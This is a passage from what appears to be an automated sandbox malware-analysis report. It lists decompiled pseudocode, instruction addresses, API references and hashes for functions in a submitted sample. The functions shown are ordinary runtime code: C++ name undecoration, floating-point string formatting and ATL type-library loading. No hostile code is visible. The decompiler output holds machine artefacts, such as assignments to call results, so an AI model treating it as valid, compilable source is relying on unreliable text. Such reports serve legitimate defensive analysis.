						 *0xb30640 = __eax;
						__ecx =  &_v76;
						__eax = E0096AB50( &_v76);
						__ecx =  &_v20;
						__edx = _a4;
						__eax = _a4;
						return _a4;
					case 3:
						__ecx = _a8;
						__eax = E0096A560(_a8);
						__eflags = __eax;
						if(__eax != 0) {
							_v36 = E00960060("volatile", 8);
							_v32 = __edx;
							__ecx =  &_v36;
							__ecx =  &_v20;
							__eax = E0095F7E0( &_v20,  &_v36);
						} else {
							_v28 = E00960060("volatile ", 9);
							_v24 = __edx;
							__eax =  &_v28;
							__ecx =  &_v20;
							__eax = E0095F7E0( &_v20,  &_v28);
						}
						goto L6;
					case 4:
						goto L28;
				}
			}























                      0x00966ab9
                      0x00966abe
                      0x00966ac6
                      0x00966acd
                      0x00966e3e
                      0x00966e46
                      0x00000000
                      0x00966e4e
                      0x00966ad6
                      0x00966add
                      0x00000000
                      0x00966aee
                      0x00000000
                      0x00000000
                      0x00966b8f
                      0x00966b92
                      0x00966b98
                      0x00966b9c
                      0x00966b9f
                      0x00966be5
                      0x00966bee
                      0x00966bf4
                      0x00966bf9
                      0x00966bfc
                      0x00966bff
                      0x00966c03
                      0x00966e2f
                      0x00966e31
                      0x00966e39
                      0x00000000
                      0x00966e39
                      0x00966c0c
                      0x00966c0c
                      0x00966c13
                      0x00000000
                      0x00966e18
                      0x00966e1e
                      0x00966e2a
                      0x00000000
                      0x00000000
                      0x00966c20
                      0x00966c23
                      0x00966c29
                      0x00966c31
                      0x00966c39
                      0x00000000
                      0x00000000
                      0x00966c47
                      0x00966c4a
                      0x00966c52
                      0x00966c5a
                      0x00966c62
                      0x00000000
                      0x00000000
                      0x00966c70
                      0x00966c73
                      0x00966c7b
                      0x00966c7e
                      0x00966c86
                      0x00966c8e
                      0x00966c97
                      0x00966ca3
                      0x00000000
                      0x00000000
                      0x00966d00
                      0x00966d00
                      0x00966d04
                      0x00966d07
                      0x00966d0c
                      0x00966d15
                      0x00966d1d
                      0x00966d26
                      0x00966d2a
                      0x00966d36
                      0x00000000
                      0x00000000
                      0x00966cb0
                      0x00966cb3
                      0x00966cb8
                      0x00966cba
                      0x00966cee
                      0x00966cf1
                      0x00966cf4
                      0x00966cf8
                      0x00966cfb
                      0x00966cbc
                      0x00966ccb
                      0x00966cce
                      0x00966cd1
                      0x00966cd5
                      0x00966cd8
                      0x00966cd8
                      0x00000000
                      0x00000000
                      0x00966d44
                      0x00966d47
                      0x00966d4f
                      0x00966d57
                      0x00000000
                      0x00000000
                      0x00966d69
                      0x00966d6c
                      0x00966d71
                      0x00966d74
                      0x00966d79
                      0x00966d7b
                      0x00966dbf
                      0x00966dc2
                      0x00966dc5
                      0x00966dc9
                      0x00966dd1
                      0x00000000
                      0x00966dd1
                      0x00966d8c
                      0x00966d8f
                      0x00966d92
                      0x00966d96
                      0x00966d9e
                      0x00966da6
                      0x00000000
                      0x00000000
                      0x00966dfe
                      0x00966e01
                      0x00966e07
                      0x00966e0b
                      0x00966e13
                      0x00000000
                      0x00000000
                      0x00966dde
                      0x00966de1
                      0x00966deb
                      0x00966df3
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00966c13
                      0x00966ba6
                      0x00966ba9
                      0x00966baf
                      0x00966bb3
                      0x00966bb5
                      0x00966bb7
                      0x00966bbd
                      0x00966bc9
                      0x00000000
                      0x00966bc9
                      0x00966bd5
                      0x00966bdd
                      0x00000000
                      0x00000000
                      0x00966b4e
                      0x00966b4e
                      0x00966b52
                      0x00966b55
                      0x00966b5a
                      0x00966b62
                      0x00966b69
                      0x00966b6c
                      0x00966b72
                      0x00966b76
                      0x00966b82
                      0x00000000
                      0x00000000
                      0x00966afe
                      0x00966b01
                      0x00966b06
                      0x00966b08
                      0x00966b3c
                      0x00966b3f
                      0x00966b42
                      0x00966b46
                      0x00966b49
                      0x00966b0a
                      0x00966b19
                      0x00966b1c
                      0x00966b1f
                      0x00966b23
                      0x00966b26
                      0x00966b26
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: operator+$EmptyIterator_baseIterator_base::_MailboxName::isName::setchar_traitsstd::_
                      • String ID: B$std::nullptr_t$std::nullptr_t $volatile$volatile
                      • API String ID: 1073764026-1853825697
                      • Opcode ID: 4c2151f5e9ad7f86f216909bcecb1ba8b84e5ea9defa968550a8c2ab5a2a1338
                      • Instruction ID: 3701c31062f68de2aca2d3fefdfb62a5d7cf8c43712494cc6d918d48ba43d90e
                      • Opcode Fuzzy Hash: 4c2151f5e9ad7f86f216909bcecb1ba8b84e5ea9defa968550a8c2ab5a2a1338
                      • Instruction Fuzzy Hash: 0BB161B5950108EBDB04EF94DCA2EEE3775BFC4304F148129F9099B255EB32EA54CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0096A1E0 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 239COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 89%
                      			E0096A1E0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, signed char _a12) {
				signed int _v8;
				char _v24;
				signed char _v25;
				signed char _v26;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v80;
				char _v84;
				signed int _v88;
				char _v92;
				char _v100;
				char _v108;
				char _v116;
				char _v124;
				char _v132;
				char _v140;
				char _v148;
				char _v156;
				char _v164;
				signed int _t75;
				signed int _t77;
				signed int _t81;
				void* _t82;
				void* _t83;
				intOrPtr _t87;
				char _t115;
				char _t117;
				signed int _t118;
				signed int _t123;
				void* _t127;
				intOrPtr _t129;
				signed int _t131;
				intOrPtr _t139;
				intOrPtr _t140;
				signed int _t143;
				signed int _t158;
				signed int _t163;
				intOrPtr _t168;
				signed int _t169;
				signed int _t172;
				intOrPtr _t174;
				signed int _t180;
				signed int _t181;
				signed int _t184;
				void* _t185;
				void* _t186;
				signed int _t187;
				void* _t188;
				void* _t190;
				void* _t191;

				_t186 = __esi;
				_t185 = __edi;
				_t127 = __ebx;
				_t75 =  *0xa0600c; // 0x5d529087
				_v8 = _t75 ^ _t187;
				_t77 =  *0xb30640; // 0x0
				_t129 =  *_t77 - 0x30;
				_v40 = _t129;
				if(_t129 < 0 || _v40 > 9) {
					E0095F3F0( &_v36);
					_t169 =  *0xb30640; // 0x0
					if( *_t169 != 0x3f) {
						_v25 = 0;
						_v48 = E00960060(0x9fe94d, 0);
						_v44 = _t169;
						_t81 =  *0xb30640; // 0x0
						_t82 = E0096AC10(_t81, "template-parameter-", 0x13);
						_t190 = _t188 + 0x14;
						if(_t82 != 0) {
							_t131 =  *0xb30640; // 0x0
							_t83 = E0096AC10(_t131, "generic-type-", 0xd);
							_t191 = _t190 + 0xc;
							if(_t83 == 0) {
								_v25 = 1;
								_t115 = E00960060("`generic-type-", 0xe);
								_t191 = _t191 + 8;
								_v92 = _t115;
								_v88 = _t169;
								_v48 = _v92;
								_v44 = _v88;
								_t158 =  *0xb30640; // 0x0
								 *0xb30640 = _t158 + 0xd;
							}
						} else {
							_v25 = 1;
							_t117 = E00960060("`template-parameter-", 0x14);
							_t191 = _t190 + 8;
							_v84 = _t117;
							_v80 = _t169;
							_v48 = _v84;
							_v44 = _v80;
							_t118 =  *0xb30640; // 0x0
							 *0xb30640 = _t118 + 0x13;
						}
						if((_v25 & 0x000000ff) == 0) {
							if((_a12 & 0x000000ff) == 0) {
								L26:
								E0095F820( &_v36, E0095F080( &_v164, 0xb30640, 0x40));
								goto L27;
							}
							_t172 =  *0xb30640; // 0x0
							if( *_t172 != 0x40) {
								goto L26;
							}
							E0095F820( &_v36, E0095F3F0( &_v156));
							_t143 =  *0xb30640; // 0x0
							 *0xb30640 = _t143 + 1;
							goto L27;
						} else {
							E00967C80(_t127, _t185, _t186,  &_v100);
							if(E0096A510() == 0 ||  *0xb30650 == 0) {
								_v76 = E0095FAA0( &_v140,  &_v48,  &_v100);
								E0095F820( &_v36, E0095FBB0(_v76,  &_v148, 0x27));
							} else {
								E00967D80( &_v100,  &_v24, 0x10);
								_t174 =  *0xb30650; // 0x0
								_v68 = _t174;
								_v56 = _v68;
								 *0x9d62b0(E009A2B00( &_v24));
								_v60 = _v56();
								if(_v60 == 0) {
									_v72 = E0095FAA0( &_v124,  &_v48,  &_v100);
									E0095F820( &_v36, E0095FBB0(_v72,  &_v132, 0x27));
								} else {
									_v26 = 0;
									_push(_v26 & 0x000000ff);
									E0095F820( &_v36, E0095E750( &_v116, _v60));
								}
							}
							L27:
							_t171 = _a8 & 0x000000ff;
							if((_a8 & 0x000000ff) != 0) {
								_t139 =  *0xb30638; // 0x0
								if(E0096A590(_t139) == 0) {
									_t140 =  *0xb30638; // 0x0
									L0095FF70(_t140,  &_v36);
								}
							}
							E0095F240(_a4,  &_v36);
							_t87 = _a4;
							goto L31;
						}
					}
					E0095F820( &_v36, E00968500(_t127, _t185, _t186,  &_v108, 0));
					_t180 =  *0xb30640; // 0x0
					_v64 =  *_t180;
					_t163 =  *0xb30640; // 0x0
					 *0xb30640 = _t163 + 1;
					if(_v64 != 0x40) {
						_t181 =  *0xb30640; // 0x0
						 *0xb30640 = _t181 - 1;
						_t123 =  *0xb30640; // 0x0
						if( *_t123 == 0) {
							_v52 = 1;
						} else {
							_v52 = 2;
						}
						E0095F920( &_v36, _v52);
					}
					goto L27;
				} else {
					_t184 =  *0xb30640; // 0x0
					_t171 = _t184 + 1;
					 *0xb30640 = _t184 + 1;
					_t168 =  *0xb30638; // 0x0
					E0095F9A0(_t168, _a4, _v40);
					_t87 = _a4;
					L31:
					return E00957280(_t87, _t127, _v8 ^ _t187, _t171, _t185, _t186);
				}
			}






























































                      0x0096a1e0
                      0x0096a1e0
                      0x0096a1e0
                      0x0096a1e9
                      0x0096a1f0
                      0x0096a1f3
                      0x0096a1fb
                      0x0096a1fe
                      0x0096a201
                      0x0096a23b
                      0x0096a240
                      0x0096a24c
                      0x0096a2c2
                      0x0096a2d5
                      0x0096a2d8
                      0x0096a2e2
                      0x0096a2e8
                      0x0096a2ed
                      0x0096a2f2
                      0x0096a32f
                      0x0096a336
                      0x0096a33b
                      0x0096a340
                      0x0096a342
                      0x0096a34d
                      0x0096a352
                      0x0096a355
                      0x0096a358
                      0x0096a361
                      0x0096a364
                      0x0096a367
                      0x0096a370
                      0x0096a370
                      0x0096a2f4
                      0x0096a2f4
                      0x0096a2ff
                      0x0096a304
                      0x0096a307
                      0x0096a30a
                      0x0096a313
                      0x0096a316
                      0x0096a319
                      0x0096a321
                      0x0096a321
                      0x0096a37c
                      0x0096a477
                      0x0096a4ac
                      0x0096a4c2
                      0x00000000
                      0x0096a4c2
                      0x0096a479
                      0x0096a485
                      0x00000000
                      0x00000000
                      0x0096a496
                      0x0096a49b
                      0x0096a4a4
                      0x00000000
                      0x0096a382
                      0x0096a386
                      0x0096a395
                      0x0096a452
                      0x0096a46a
                      0x0096a3a8
                      0x0096a3b1
                      0x0096a3b6
                      0x0096a3bc
                      0x0096a3cf
                      0x0096a3d5
                      0x0096a3e1
                      0x0096a3e8
                      0x0096a41f
                      0x0096a434
                      0x0096a3ea
                      0x0096a3ec
                      0x0096a3f3
                      0x0096a404
                      0x0096a404
                      0x0096a439
                      0x0096a4c7
                      0x0096a4c7
                      0x0096a4cd
                      0x0096a4cf
                      0x0096a4dc
                      0x0096a4e2
                      0x0096a4e8
                      0x0096a4e8
                      0x0096a4dc
                      0x0096a4f4
                      0x0096a4f9
                      0x00000000
                      0x0096a4f9
                      0x0096a37c
                      0x0096a260
                      0x0096a265
                      0x0096a26e
                      0x0096a271
                      0x0096a27a
                      0x0096a284
                      0x0096a286
                      0x0096a28f
                      0x0096a295
                      0x0096a29f
                      0x0096a2aa
                      0x0096a2a1
                      0x0096a2a1
                      0x0096a2a1
                      0x0096a2b8
                      0x0096a2b8
                      0x00000000
                      0x0096a209
                      0x0096a209
                      0x0096a20f
                      0x0096a212
                      0x0096a220
                      0x0096a226
                      0x0096a22b
                      0x0096a4fc
                      0x0096a509
                      0x0096a509

                      APIs
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 0096A23B
                      • Mailbox.LIBCMTD ref: 0096A260
                      • DName::operator=.LIBVCRUNTIMED ref: 0096A2B8
                      • und_strncmp.LIBCMTD ref: 0096A2E8
                      • DName::getString.LIBCMTD ref: 0096A3B1
                      • Mailbox.LIBCMTD ref: 0096A404
                        • Part of subcall function 0095F9A0: DName::DName.LIBVCRUNTIMED ref: 0095F9B8
                      • Replicator::isFull.LIBCMTD ref: 0096A4D5
                      • Replicator::operator+=.LIBCMTD ref: 0096A4E8
                      • Mailbox.LIBCMTD ref: 0096A4F4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Mailbox$FullIterator_baseIterator_base::_NameName::Name::getName::operator=Replicator::isReplicator::operator+=Stringstd::_und_strncmp
                      • String ID: @$`generic-type-$`template-parameter-$generic-type-$template-parameter-
                      • API String ID: 3194277874-3433397351
                      • Opcode ID: 1c3b10620952961c63f28214113d5c2d0f89e1916da84726797af11f80a5db72
                      • Instruction ID: 9fd8f9af40c3585705b50da140e183bcd31907392dcddc810b5694bbc07be207
                      • Opcode Fuzzy Hash: 1c3b10620952961c63f28214113d5c2d0f89e1916da84726797af11f80a5db72
                      • Instruction Fuzzy Hash: AAA18FB1D102189FDB14EFA4DCA2BEEBBB5BF84304F144029E80AB7265EB746904CF51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009BC260 Relevance: 38.7, APIs: 10, Strings: 12, Instructions: 196COMMON
                      Download Yara Rule
                      C-Code - Quality: 85%
                      			E009BC260(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, long long _a4, intOrPtr _a12, intOrPtr* _a16, char* _a20, char* _a24) {
				char _v5;
				void* _v6;
				signed char _v7;
				intOrPtr* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v56;
				signed int _t84;
				intOrPtr* _t100;
				void* _t103;
				intOrPtr* _t111;
				intOrPtr* _t112;
				signed int _t123;
				signed int _t127;
				intOrPtr _t136;
				void* _t141;
				void* _t142;
				void* _t143;
				void* _t144;

				_t142 = __esi;
				_t141 = __edi;
				_t103 = __ebx;
				E009BAA30( &_v56, __edx, __eflags);
				_v12 =  &_a4;
				_t123 =  *(_v12 + 4);
				_v28 = E009CEEF0( *_v12, 0x3f, _t123) & 0x00000001;
				_v24 = _t123 & 0x00000000;
				if(_v28 != 1 || _v24 != 0) {
					_v5 = 0x20;
				} else {
					_v5 = 0x2d;
				}
				 *_a16 = _v5;
				 *((intOrPtr*)(_a16 + 8)) = _a20;
				_t127 =  *(_v12 + 4);
				_v36 = E009CEEF0( *_v12, 0x34, _t127) & 0x000007ff;
				_v32 = _t127 & 0x00000000;
				if((_v36 | _v32) != 0) {
					L7:
					_v6 = 0;
					goto L8;
				} else {
					_t100 = _v12;
					_v44 =  *_t100;
					_v40 =  *(_t100 + 4) & 0x000fffff;
					if((_v44 | _v40) != 0) {
						goto L7;
					}
					_v6 = 1;
					L8:
					_v7 = _v6;
					if((_v7 & 0x000000ff) == 0) {
						_t84 = E009A6D50(__eflags,  &_a4);
						_t144 = _t143 + 4;
						_v20 = _t84;
						__eflags = _v20;
						if(_v20 != 0) {
							 *((intOrPtr*)(_a16 + 4)) = 1;
						}
						_v16 = _v20;
						_v16 = _v16 - 1;
						__eflags = _v16 - 3;
						if(_v16 > 3) {
							_t111 = _v12;
							_t112 = _v12;
							 *_t112 =  *_t111;
							 *(_t112 + 4) =  *(_t111 + 4) & 0x7fffffff;
							_push(_a24);
							_push(_a20);
							_push(_a16 + 4);
							_t136 = _a12 + 1;
							__eflags = _t136;
							_push(_t136);
							 *((long long*)(_t144 - 8)) = _a4;
							E009BA370(_t103, _t141, _t142);
							return E009BAA80( &_v56);
						} else {
							switch( *((intOrPtr*)(_v16 * 4 +  &M009BC4E8))) {
								case 0:
									E00994A20(E00992DE0(_a20, _a24, "1#INF"), _t93, L"strcpy_s(result, result_count, \"1#INF\" )", L"__acrt_fltout", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\cfout.cpp", 0x12b, 0);
									return E009BAA80( &_v56);
								case 1:
									__ecx = _a24;
									__edx = _a20;
									E00992DE0(_a20, _a24, "1#QNAN") = E00994A20(__eax, __eax, L"strcpy_s(result, result_count, \"1#QNAN\")", L"__acrt_fltout", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\cfout.cpp", 0x12c, 0);
									__ecx =  &_v56;
									return E009BAA80( &_v56);
								case 2:
									__eax = _a24;
									__ecx = _a20;
									E00992DE0(_a20, _a24, "1#SNAN") = E00994A20(__eax, __eax, L"strcpy_s(result, result_count, \"1#SNAN\")", L"__acrt_fltout", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\cfout.cpp", 0x12d, 0);
									__ecx =  &_v56;
									return E009BAA80( &_v56);
								case 3:
									__edx = _a24;
									__eax = _a20;
									E00992DE0(_a20, _a24, "1#IND") = E00994A20(__eax, __eax, L"strcpy_s(result, result_count, \"1#IND\" )", L"__acrt_fltout", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\cfout.cpp", 0x12e, 0);
									__ecx =  &_v56;
									return E009BAA80( &_v56);
							}
						}
					}
					 *((intOrPtr*)(_a16 + 4)) = 0;
					E00994A20(E00992DE0(_a20, _a24, "0"), _t97, L"strcpy_s(result, result_count, \"0\")", L"__acrt_fltout", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\cfout.cpp", 0x11e, 0);
					return E009BAA80( &_v56);
				}
			}




























                      0x009bc260
                      0x009bc260
                      0x009bc260
                      0x009bc26b
                      0x009bc273
                      0x009bc27b
                      0x009bc28b
                      0x009bc28e
                      0x009bc295
                      0x009bc2a3
                      0x009bc29d
                      0x009bc29d
                      0x009bc29d
                      0x009bc2ae
                      0x009bc2b6
                      0x009bc2be
                      0x009bc2d0
                      0x009bc2d3
                      0x009bc2dc
                      0x009bc300
                      0x009bc300
                      0x00000000
                      0x009bc2de
                      0x009bc2de
                      0x009bc2ec
                      0x009bc2ef
                      0x009bc2f8
                      0x00000000
                      0x00000000
                      0x009bc2fa
                      0x009bc304
                      0x009bc307
                      0x009bc310
                      0x009bc361
                      0x009bc366
                      0x009bc369
                      0x009bc36c
                      0x009bc370
                      0x009bc375
                      0x009bc375
                      0x009bc37f
                      0x009bc388
                      0x009bc38b
                      0x009bc38f
                      0x009bc4a0
                      0x009bc4ad
                      0x009bc4b0
                      0x009bc4b2
                      0x009bc4b8
                      0x009bc4bc
                      0x009bc4c3
                      0x009bc4c7
                      0x009bc4c7
                      0x009bc4ca
                      0x009bc4d1
                      0x009bc4d4
                      0x00000000
                      0x009bc395
                      0x009bc398
                      0x00000000
                      0x009bc3cb
                      0x00000000
                      0x00000000
                      0x009bc3fb
                      0x009bc3ff
                      0x009bc40c
                      0x009bc414
                      0x00000000
                      0x00000000
                      0x009bc43c
                      0x009bc440
                      0x009bc44d
                      0x009bc455
                      0x00000000
                      0x00000000
                      0x009bc47d
                      0x009bc481
                      0x009bc48e
                      0x009bc496
                      0x00000000
                      0x00000000
                      0x009bc398
                      0x009bc38f
                      0x009bc315
                      0x009bc348
                      0x00000000
                      0x009bc353

                      APIs
                      • __aligned_msize.LIBCMTD ref: 009BC33F
                      • __invoke_watson_if_error.LIBCMTD ref: 009BC348
                      • __aligned_msize.LIBCMTD ref: 009BC3C2
                      • __invoke_watson_if_error.LIBCMTD ref: 009BC3CB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: __aligned_msize__invoke_watson_if_error
                      • String ID: $1#IND$1#INF$1#QNAN$1#SNAN$__acrt_fltout$minkernel\crts\ucrt\src\appcrt\convert\cfout.cpp$strcpy_s(result, result_count, "0")$strcpy_s(result, result_count, "1#IND" )$strcpy_s(result, result_count, "1#INF" )$strcpy_s(result, result_count, "1#QNAN")$strcpy_s(result, result_count, "1#SNAN")
                      • API String ID: 4254006664-1152488507
                      • Opcode ID: 52a062bf24def20e943da5e3b4b3c5a0ce8754c9975faea8af971eca1e8a501b
                      • Instruction ID: d1b42850a1e243e77734608f0e45115a3d1aa7c4e786fabcbaae5c5e2053070e
                      • Opcode Fuzzy Hash: 52a062bf24def20e943da5e3b4b3c5a0ce8754c9975faea8af971eca1e8a501b
                      • Instruction Fuzzy Hash: 957181B0E00208EBCB04EF94DA92FEE7BB5AF98718F148458F50577282D675AA11CBD1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0094A1D0 Relevance: 33.7, APIs: 11, Strings: 8, Instructions: 444COMMON
                      Download Yara Rule
                      C-Code - Quality: 88%
                      			E0094A1D0(void* __ebx, struct HINSTANCE__* _a4, signed int _a8, struct HINSTANCE__* _a12, struct HINSTANCE__* _a16) {
				signed int _v8;
				unsigned int _v16;
				intOrPtr _v24;
				signed int _v28;
				CHAR* _v32;
				char _v40;
				char _v320;
				signed int _v328;
				intOrPtr _v332;
				struct HINSTANCE__ _v336;
				signed int _v340;
				intOrPtr _v344;
				struct HINSTANCE__* _v348;
				signed int _v352;
				signed int _v356;
				char _v364;
				char _v368;
				intOrPtr _v376;
				intOrPtr _v380;
				intOrPtr _v384;
				intOrPtr _v388;
				intOrPtr _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				signed int _v404;
				struct HINSTANCE__ _v412;
				struct HINSTANCE__* _v420;
				struct HINSTANCE__* _v424;
				intOrPtr _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				struct HINSTANCE__* _v440;
				struct HINSTANCE__* _v444;
				intOrPtr _v448;
				intOrPtr _v452;
				intOrPtr _v456;
				struct HINSTANCE__* _v460;
				struct HINSTANCE__* _v464;
				intOrPtr _v468;
				intOrPtr _v472;
				char _v476;
				void* _v484;
				void* __edx;
				void* __edi;
				void* __esi;
				signed int _t202;
				void* _t204;
				intOrPtr _t205;
				void* _t207;
				long _t211;
				struct HINSTANCE__ _t213;
				signed int _t217;
				void* _t228;
				char _t231;
				signed int _t239;
				signed char _t247;
				signed char _t255;
				signed int _t263;
				intOrPtr _t269;
				signed char _t276;
				void* _t286;
				void* _t287;
				struct HINSTANCE__* _t344;
				void* _t346;
				char _t354;
				void* _t375;
				void* _t376;
				signed int _t378;
				void* _t379;
				intOrPtr _t380;
				intOrPtr _t382;
				void* _t384;
				void* _t387;

				_t287 = __ebx;
				_t375 =  &_v476;
				memset(_t375, 0xcccccccc, 0x76 << 2);
				_t380 = _t379 + 0xc;
				_t376 = _t375 + 0x76;
				_t202 =  *0xa0600c; // 0x5d529087
				_v8 = _t202 ^ _t378;
				_v412 = 0;
				if(_a12 == 0) {
					L2:
					_t204 = L00994930(_t390, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1bcb, 0, "%ls", L"pbstrPath != 0 && ppTypeLib != 0");
					_t380 = _t380 + 0x18;
					if(_t204 == 1) {
						asm("int3");
					}
					L4:
					if(_a12 == 0 || _a16 == 0) {
						_t205 = 0x80004003;
						goto L64;
					} else {
						 *_a12 = 0;
						 *_a16 = 0;
						_v16 = 0;
						_v24 = E00941AB0();
						_v28 = 0;
						_v32 = 0;
						E0094F2E0( &_v40);
						__eflags = _a4;
						if(__eflags == 0) {
							_t286 = L00994930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1bd3, 0, "%ls", L"hInstTypeLib != 0");
							_t380 = _t380 + 0x18;
							__eflags = _t286 - 1;
							if(_t286 == 1) {
								asm("int3");
							}
						}
						_t377 = _t380;
						_t344 = _a4;
						_t211 = GetModuleFileNameA(_t344,  &_v320, 0x104);
						__eflags = _t380 - _t380;
						_v328 = E009D1520(_t211, _t380 - _t380);
						__eflags = _v328;
						if(_v328 != 0) {
							__eflags = _v328 - 0x104;
							if(_v328 != 0x104) {
								_v336 = 0;
								_t213 = E009CFED0(_t377,  &_v320);
								_t382 = _t380 + 4;
								_v336 = _t213;
								__eflags = _a8;
								if(_a8 == 0) {
									L32:
									_v32 =  &_v320;
									__eflags = _v32;
									if(_v32 != 0) {
										_v16 = E00992E00(_v32) + 1;
										_t217 = E00941780( &_v16, _t377, __eflags,  &_v16, _v16, 2);
										_t382 = _t382 + 0x10;
										__eflags = _t217;
										if(_t217 >= 0) {
											__eflags = _v16 - 0x400;
											if(__eflags > 0) {
												L39:
												_v456 = E0094F270(_t287,  &_v40, __eflags, _v16);
												L40:
												_t300 = _v16 >> 1;
												__eflags = _v16 >> 1;
												_v444 = E00941AC0(_v16 >> 1, _t377, _v456, _v32, _t300, _v24);
												L41:
												_v440 = _v444;
												L42:
												_t344 = _v440;
												_v352 = _t344;
												__eflags = _v352;
												if(_v352 != 0) {
													_t377 = _t382;
													__imp__#161(_v352, _a16);
													__eflags = _t382 - _t382;
													_v356 = E009D1520(_a16, _t382 - _t382);
													__eflags = _v356;
													if(_v356 >= 0) {
														L60:
														__eflags = _v356;
														if(_v356 >= 0) {
															_t377 = _t382;
															__imp__#2(_v352);
															__eflags = _t382 - _t382;
															 *_a12 = E009D1520(_t223, _t382 - _t382);
															_t344 = _a12;
															__eflags = _t344->i;
															if(_t344->i == 0) {
																_v356 = 0x8007000e;
																_t377 = _t382;
																_t344 =  *( *( *_a16) + 8);
																_t228 = _t344->i( *_a16);
																__eflags = _t382 - _t382;
																E009D1520(_t228, _t382 - _t382);
																 *_a16 = 0;
															}
														}
														_v404 = _v356;
														E0094F220( &_v40);
														_t205 = _v404;
														goto L64;
													}
													_t354 = ".tlb"; // 0x626c742e
													_v368 = _t354;
													_t231 =  *0x9ff704; // 0x0
													_v364 = _t231;
													_t344 =  &_v320;
													__eflags = _v336 - _t344 + 5 - 0x104;
													if(__eflags <= 0) {
														E009426C0(_t287, _t376, _t377, __eflags, _v336, 0x10e - _v336 -  &_v320,  &_v368);
														_t384 = _t382 + 0xc;
														_v32 =  &_v320;
														__eflags = _v32;
														if(_v32 != 0) {
															_v16 = E00992E00(_v32) + 1;
															_t239 = E00941780( &_v16, _t377, __eflags,  &_v16, _v16, 2);
															_t382 = _t384 + 0x10;
